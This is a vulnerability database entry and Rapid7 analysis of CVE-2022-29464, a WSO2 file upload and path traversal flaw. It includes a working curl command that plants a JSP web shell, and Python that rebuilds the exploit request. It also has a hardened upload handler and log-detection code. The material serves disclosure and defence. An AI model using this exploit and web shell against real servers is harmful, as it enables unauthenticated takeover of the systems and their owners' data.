Attacker Value
Very High
(2 users assessed)
Exploitability
Very High
(2 users assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network

CVE-2022-29464

Disclosure Date: April 18, 2022
Exploited in the Wild
Initial Access
Techniques
Validation
Validated

Description

Certain WSO2 products allow unrestricted file upload with resultant remote code execution. The attacker must use a /fileupload endpoint with a Content-Disposition directory traversal sequence to reach a directory under the web root, such as a ../../../../repository/deployment/server/webapps directory. This affects WSO2 API Manager 2.2.0 up to 4.0.0, WSO2 Identity Server 5.2.0 up to 5.11.0, WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0 and 5.6.0, WSO2 Identity Server as Key Manager 5.3.0 up to 5.11.0, WSO2 Enterprise Integrator 6.2.0 up to 6.6.0, WSO2 Open Banking AM 1.4.0 up to 2.0.0 and WSO2 Open Banking KM 1.4.0, up to 2.0.0.


3
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

This is a very easy to exploit issue. See the Rapid7 analysis for details.

2
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

The only downside of this vulnerability is that you don’t get command execution as root, you get execution in the context of the user running WSO2. Other than that, this is an attacker's delight. It is extremely trivial to exploit. Unpatched WSO2 API Managers should not be internet facing. There is a Metasploit module as well as PoC details available. For more information see the Rapid7 Analysis.

CVSS V3 Severity and Metrics
Base Score:
9.8 Critical
Impact Score:
5.9
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • wso2

Products

  • api manager,
  • enterprise integrator,
  • identity server,
  • identity server analytics 5.4.0,
  • identity server analytics 5.4.1,
  • identity server analytics 5.5.0,
  • identity server analytics 5.6.0,
  • identity server as key manager,
  • open banking am,
  • open banking iam 2.0.0,
  • open banking km

Exploited in the Wild


Additional Info

Technical Analysis

On April 18, 2022, MITRE published CVE-2022-29464, an unrestricted file upload vulnerability affecting various WSO2 products. WSO2 followed with a security advisory explaining that the vulnerability allowed unauthenticated, remote attackers to execute arbitrary code in the following products:

  • API Manager
  • Identity Server
  • Identity Server Analytics
  • Identity Server as Key Manager
  • Enterprise Integrator

A technical writeup and proof-of-concept exploit by @hakivvi quickly followed on April 20. The proof of concept uploads a malicious .jsp to /fileupload/toolsAny on the WSO2 product’s web server. The .jsp is a web shell, and because of a directory traversal issue in the handling of the uploaded file's name, the attacker can write it to a location under the web root from which they can then send it commands. The attack is not restricted to .jsp files: other researchers, such as our old friend William Vu, have demonstrated exploitation with a .war file.

Exploitation is quite easy. The following, modeled after both the original PoC and Vu’s, uploads a simple jsp web shell that the attacker will be able to use by visiting https://target:9443/authenticationendpoint/r7.jsp:

echo '<%@ page import="java.io.*" %><% Process p = Runtime.getRuntime().exec(request.getParameter("cmd"),null,null); %>' | curl -kv -F ../../../../repository/deployment/server/webapps/authenticationendpoint/r7.jsp=@- https://10.0.0.20:9443/fileupload/toolsAny
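To make the mechanism behind the curl command above concrete, here is an added example (not WSO2's code and not the PoC author's). build_multipart() produces the body that `curl -F "<name>=@-"` sends: the traversal sequence travels in the Content-Disposition name attribute. The two path functions then model the handler's job: vulnerable_target() joins that name onto the upload directory unchanged, which is the behaviour the CVE describes, while hardened_target() keeps only the base name, enforces an extension allowlist and re-checks that the result stays under the upload directory. CARBON_HOME, the upload directory beneath it and the extension allowlist are assumptions made for illustration; the upload directory is placed four levels below CARBON_HOME so that the four "../" segments in the page's payload land where the PoC expects.

```python
"""Multipart body of the CVE-2022-29464 PoC and the path check a fix needs.

Added example, not WSO2's code or the PoC author's. Paths and the extension
allowlist are illustrative assumptions, not values from a WSO2 install.
"""
import posixpath

# Web shell body from the curl command above.
WEBSHELL = (b'<%@ page import="java.io.*" %>'
            b'<% Process p = Runtime.getRuntime().exec(request.getParameter("cmd"),null,null); %>')
TRAVERSAL_NAME = "../../../../repository/deployment/server/webapps/authenticationendpoint/r7.jsp"
CARBON_HOME = "/opt/wso2/wso2am"                        # assumed
UPLOAD_DIR = CARBON_HOME + "/tmp/work/upload/toolsAny"  # assumed: four levels below CARBON_HOME
ALLOWED_EXT = (".txt", ".zip")                          # assumed allowlist for legitimate uploads


def build_multipart(field_name: str, content: bytes, boundary: str = "r7boundary") -> bytes:
    """Body equivalent to `curl -F "<field_name>=@-"` with the payload on stdin.
    The traversal lives in the name attribute; the filename attribute here is
    our own choice and is not what the vulnerable handler keys on."""
    head = (f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{field_name}"; filename="r7.jsp"\r\n'
            "Content-Type: application/octet-stream\r\n\r\n").encode()
    return head + content + f"\r\n--{boundary}--\r\n".encode()


def vulnerable_target(upload_dir: str, part_name: str) -> str:
    """The behaviour the CVE describes: the part name is used as the file name
    unchanged, so its ../ segments select a directory outside upload_dir."""
    return posixpath.normpath(posixpath.join(upload_dir, part_name))


def hardened_target(upload_dir: str, part_name: str) -> str:
    """Drop directory components, enforce the allowlist, then re-check containment."""
    name = posixpath.basename(part_name)  # discards any ../ prefix
    if name in ("", ".", "..") or not name.lower().endswith(ALLOWED_EXT):
        raise ValueError(f"rejected upload name {part_name!r}")
    root = posixpath.normpath(upload_dir)
    target = posixpath.normpath(posixpath.join(root, name))
    if posixpath.commonpath([root, target]) != root:  # belt and braces
        raise ValueError(f"{target} escapes {root}")
    return target


def webapps_dir(carbon_home: str) -> str:
    """Directory the PoC traverses into, relative to CARBON_HOME."""
    return posixpath.join(carbon_home, "repository/deployment/server/webapps")


if __name__ == "__main__":
    print(build_multipart(TRAVERSAL_NAME, WEBSHELL).decode(errors="replace"))
    print("vulnerable handler writes:", vulnerable_target(UPLOAD_DIR, TRAVERSAL_NAME))
    for name in (TRAVERSAL_NAME, "../../x.txt", "report.txt"):
        try:
            print("hardened handler writes:", hardened_target(UPLOAD_DIR, name))
        except ValueError as e:
            print("hardened handler refuses:", e)
```

Run stand-alone it prints the raw multipart body, the webapps path the vulnerable join resolves to, and the hardened handler's decision for the PoC name, a traversal name with an allowed extension (accepted, but only as a base name under the upload directory) and a plain file name.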

Rapid7’s Managed Detection and Response (MDR) team has observed this vulnerability being opportunistically exploited in the wild. Attackers appear to be staying close to the original proof-of-concept exploit and are dropping web shells and coin miners on exploited targets. Victim systems include both Windows and Linux installations of the aforementioned WSO2 products.

Rapid7 recommends remediating this vulnerability immediately per the instructions in WSO2’s advisory. If remediation is not possible, remove installations from the public internet as soon as possible. Inspect your installation for web shells (.jsp and .class files); for example, the original proof of concept drops its web shell in /authenticationendpoint/, which, for API Manager on Windows, is located at C:\Program Files\WSO2\API Manager\3.2.0\repository\deployment\server\webapps\authenticationendpoint. Additionally, examine the server’s http_access log for requests to /fileupload/toolsAny as a possible indication of malicious activity; note that the path may appear with a doubled leading slash, as in the second line below:

10.0.0.2 - - [22/Apr/2022:15:45:22 -0400] POST /fileupload/toolsAny HTTP/1.1 200 31 - curl/7.74.0 0.016
10.0.0.2 - - [22/Apr/2022:15:48:46 -0400] POST //fileupload/toolsAny HTTP/1.1 200 31 - python-requests/2.25.1 0.000
10.0.0.2 - - [22/Apr/2022:15:49:13 -0400] POST /fileupload/toolsAny HTTP/1.1 200 32 - python-requests/2.25.1 0.000

Additionally, dropped .war files will likely be exploded into the webapps directory (e.g. C:\Program Files\WSO2\API Manager\3.2.0\repository\deployment\server\webapps). The deployment may create entries such as the following in the wso2carbon log:

TID: [-1234] [r7] [2022-04-22 15:51:32,609]  INFO {org.wso2.carbon.webapp.mgt.TomcatGenericWebappsDeployer} - Deployed webapp: StandardEngine[Catalina].StandardHost[localhost].StandardContext[/r7].File[C:\PROGRA~1\WSO2\APIMAN~1\32E445~1.0\bin\..\repository\deployment\server\webapps\r7.war]
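The two log checks described above (POSTs to /fileupload/toolsAny in http_access, and unexpected "Deployed webapp" entries in wso2carbon) are carried out by the following added example, which is not code from the page or from Rapid7. It normalises request paths so that variants such as //fileupload/toolsAny, ./ segments and percent-encoding still match, flags any POST to the /fileupload handler as well as requests that drive the PoC web shell (a .jsp fetched with a cmd parameter), and compares deployed webapp contexts against a baseline. The first three access lines and the first wso2carbon line are the ones quoted above; the other sample lines and the EXPECTED_CONTEXTS baseline are constructed for this example and stand in for an operator's own data.

```python
"""Triage of WSO2 http_access and wso2carbon logs for CVE-2022-29464 activity.

Added example, not code from the page or from Rapid7. Sample lines other
than those quoted in the analysis, and the context baseline, are constructed.
"""
import posixpath
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, unquote

# <ip> - - [<ts>] <method> <path> <proto> <status> <bytes> - <user-agent> <elapsed>
ACCESS_RE = re.compile(
    r"^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] (?P<method>[A-Z]+) (?P<path>\S+) "
    r"HTTP/[\d.]+ (?P<status>\d{3}) (?P<bytes>\d+|-) \S+ (?P<ua>.+?) (?P<elapsed>[\d.]+)$"
)
# Deployer line written when a dropped .war is exploded into webapps.
DEPLOY_RE = re.compile(
    r"TomcatGenericWebappsDeployer\} - Deployed webapp: .*"
    r"StandardContext\[(?P<ctx>[^\]]*)\]\.File\[(?P<file>[^\]]*)\]"
)
UPLOAD_PREFIX = "/fileupload/"
POC_ENDPOINT = "/fileupload/toolsAny"


@dataclass
class Finding:
    source: str   # "http_access" or "wso2carbon"
    reason: str
    line: str


def normalize_path(raw_path: str) -> str:
    """Collapse //, ./, ../ and percent-encoding so trivial variants of the
    exploit URL compare equal to the canonical form."""
    path = posixpath.normpath(unquote(raw_path))
    # normpath preserves a leading "//" (POSIX allows it); re-root explicitly.
    return "/" + path.lstrip("/")


def scan_access_log(lines):
    """Flag POSTs to the /fileupload handler and .jsp requests carrying cmd=."""
    findings = []
    for line in lines:
        m = ACCESS_RE.match(line.strip())
        if not m:
            continue  # unparseable line; a real tool would count these
        raw_path, _, query = m["path"].partition("?")
        path = normalize_path(raw_path)
        reason = None
        if m["method"] == "POST" and path.startswith(UPLOAD_PREFIX):
            tag = "endpoint used by the public PoC" if path == POC_ENDPOINT else "other fileupload handler"
            reason = f"POST to {path} ({tag}); status {m['status']}, UA {m['ua']}"
        elif path.endswith(".jsp") and "cmd" in parse_qs(query):
            reason = f"{m['method']} of {path} with cmd parameter (PoC web shell interface)"
        if reason:
            findings.append(Finding("http_access", reason, line))
    return findings


def scan_carbon_log(lines, expected_contexts):
    """Flag webapp deployments whose context path is not in the caller's baseline."""
    findings = []
    for line in lines:
        m = DEPLOY_RE.search(line)
        if m and m["ctx"] not in expected_contexts:
            findings.append(Finding("wso2carbon",
                                    f"unexpected webapp {m['ctx']} deployed from {m['file']}", line))
    return findings


ACCESS_SAMPLE = [
    # The three lines quoted in the analysis above.
    "10.0.0.2 - - [22/Apr/2022:15:45:22 -0400] POST /fileupload/toolsAny HTTP/1.1 200 31 - curl/7.74.0 0.016",
    "10.0.0.2 - - [22/Apr/2022:15:48:46 -0400] POST //fileupload/toolsAny HTTP/1.1 200 31 - python-requests/2.25.1 0.000",
    "10.0.0.2 - - [22/Apr/2022:15:49:13 -0400] POST /fileupload/toolsAny HTTP/1.1 200 32 - python-requests/2.25.1 0.000",
    # Constructed: a benign management-console request and a hit on the dropped shell.
    "10.0.0.3 - - [22/Apr/2022:15:50:01 -0400] GET /carbon/admin/login.jsp HTTP/1.1 200 5120 - Mozilla/5.0 0.004",
    "10.0.0.2 - - [22/Apr/2022:15:50:30 -0400] GET /authenticationendpoint/r7.jsp?cmd=whoami HTTP/1.1 200 0 - curl/7.74.0 0.120",
]
CARBON_SAMPLE = [
    # The deployer line quoted above, then a constructed benign deployment.
    r"TID: [-1234] [r7] [2022-04-22 15:51:32,609]  INFO {org.wso2.carbon.webapp.mgt.TomcatGenericWebappsDeployer} - Deployed webapp: StandardEngine[Catalina].StandardHost[localhost].StandardContext[/r7].File[C:\PROGRA~1\WSO2\APIMAN~1\32E445~1.0\bin\..\repository\deployment\server\webapps\r7.war]",
    r"TID: [-1234] [authenticationendpoint] [2022-04-22 15:51:40,102]  INFO {org.wso2.carbon.webapp.mgt.TomcatGenericWebappsDeployer} - Deployed webapp: StandardEngine[Catalina].StandardHost[localhost].StandardContext[/authenticationendpoint].File[C:\PROGRA~1\WSO2\APIMAN~1\32E445~1.0\bin\..\repository\deployment\server\webapps\authenticationendpoint.war]",
]
# Assumption: a real baseline is taken from a clean install of the same product version.
EXPECTED_CONTEXTS = {"/authenticationendpoint"}


def run_example():
    return scan_access_log(ACCESS_SAMPLE), scan_carbon_log(CARBON_SAMPLE, EXPECTED_CONTEXTS)


if __name__ == "__main__":
    access, carbon = run_example()
    for f in access + carbon:
        print(f"[{f.source}] {f.reason}\n    {f.line}")
```

The path normalisation is the part worth keeping: a string match on the literal "/fileupload/toolsAny" misses the //fileupload/toolsAny form that appears in the second quoted log line, and would equally miss ./ or percent-encoded variants. The baseline for wso2carbon must come from a known-good installation of the same version; the single-entry set here only illustrates the comparison.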